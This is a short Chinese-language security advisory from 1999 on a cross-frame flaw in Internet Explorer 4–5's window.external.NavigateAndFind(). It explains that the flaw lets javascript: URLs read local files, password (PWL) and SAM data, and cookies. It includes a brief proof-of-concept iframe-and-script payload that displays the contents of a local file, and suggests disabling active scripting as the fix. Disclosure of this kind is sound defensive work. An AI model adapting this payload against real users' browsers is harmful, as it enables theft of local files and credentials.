IE external.NavigateAndFind() Cross-Frame漏洞发布时间:1999-12-21 更新时间:1999-12-21 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:客户机模式 受影响系统 WinNT详细描述 使用window.externa.NavigateAndFind()函数的服务器可 能导致在IE4,5,5.1客户端上执行任意JAVASCRIPT代码。 这个功能是用来装载一个WEB文档的,通过搜索特征字符串 在第二个帧面来显示结果,但是,这功能可以接受 javascrp:形式的URL,当这种URL传递给这项功能时,在另 一帧中可以旁路过安全设置执行JAVASCRIPT的任意代码, 这种漏洞可以用来获取PWL文件,本地的SAM数据库, COOKIE和任意这个客户用户可以访问的信息。攻击者可以 使用WEB发布,HTML MAIL和新闻组来发布。 测试代码 <IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME> <SCRIPT> function f() { window.external.NavigateAndFind("javascript:alert (document.body.innerText);","ll","I1"); } setTimeout("f()",2000); </SCRIPT> 并可以到下面的站点测试:http://www.nat.bg/~joro/navan.html 解决方案 关闭ACTIVE SCRIPT 相关信息 |
